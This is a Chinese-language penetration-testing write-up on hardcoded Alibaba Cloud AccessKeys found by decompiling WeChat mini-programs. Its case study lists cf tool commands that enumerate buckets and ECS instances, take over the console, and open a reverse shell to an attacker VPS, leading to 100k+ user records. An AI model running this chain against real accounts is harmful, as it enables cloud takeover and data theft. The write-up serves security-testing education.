1. Accesskey泄露漏洞

這篇文章里面都是以我個人的視角來進行的，因為一些原因，中間刪了好多東西，肯定有很多不正確的地方，希望大家能理解，也能指正其中的錯誤。

在以前文章里面，我們一起學習過mac下新版微信小程序反編譯學習，通過反編譯，來尋找一些漏洞，今天來學習下小程序里面的硬編碼漏洞，其實硬編碼漏洞，在這里指的是一些osskey、oss存儲桶、賬號密碼信息等寫死在了小程序里面，通過反編譯可以直接找到這些信息。

Accesskey就是密鑰，可以直接理解為賬號密碼信息，一般由AccessKeySecret和OSSAccessKeyId組成，可以通過諸多工具登錄云服務器。

關鍵字：oss、accesskey等

這種泄露，目前我反編譯過很多小程序里面，也只遇到過幾次而已（可能與我接到的需求不同有關），當小程序反編譯之后，可以在里面全局搜索關鍵字，然后看下。

這種漏洞很簡單，其實無論是小程序還是app，都是硬編碼導致的漏洞。

本文僅對mac版較新的3.8.1版本的微信展開，不對其他環境負責。

本文的操作均是在有授權的情況下進行的。

2. AccessKey泄露案例-某電力行業

在某次攻防演練中，通過信息搜集到某電力行業存在商業小程序，于是通過反編譯該小程序，進行快速打點，在這里直接搜到了泄露的Accesskey信息：

通過該信息直接在cf工具上進行配置，查看當前權限：

./cf alibaba perm

獲取其中的存儲桶信息：

./cf alibaba oss ls

直接看下多少個桶：

./cf alibaba oss ls -n 100

利用命令接管賬號權限：（此命令執行之后，阿里云會給賬戶所有者發送短信和郵件進行提醒）

./cf alibaba console

列出當前的ecs資源：

./cf alibaba ecs ls

列出ecs之后，執行命令，嘗試執行命令：

./cf alibaba ecs exec -b

反彈shell看下：

./cf alibaba ecs exec --lhost 攻擊機vps --lport 4144 -i i-2

反彈到shell之后，通過命令尋找到了其中存在nacos服務，最終在數據庫中找到10w+敏感用戶數據。

3. 總結

在有授權的情況下，如果是hw的話，一般時間緊，任務重，主要是以發現有效的信息、RCE為主，而Accesskey這種一般在hw里面出現的可能性還是比較小的，但是在市面上一些其他的小程序里面找到還是相對比較容易的，比如以前看到的某成人用品店：

這個是在以前滲透的時候遇到的：

當時正在學習小程序（比較好奇哪些朋友用過），于是就對其進行了簡單的分析，逆向之后就發現了不得了的東西：

當然，因為沒有授權，在這里也就結束了。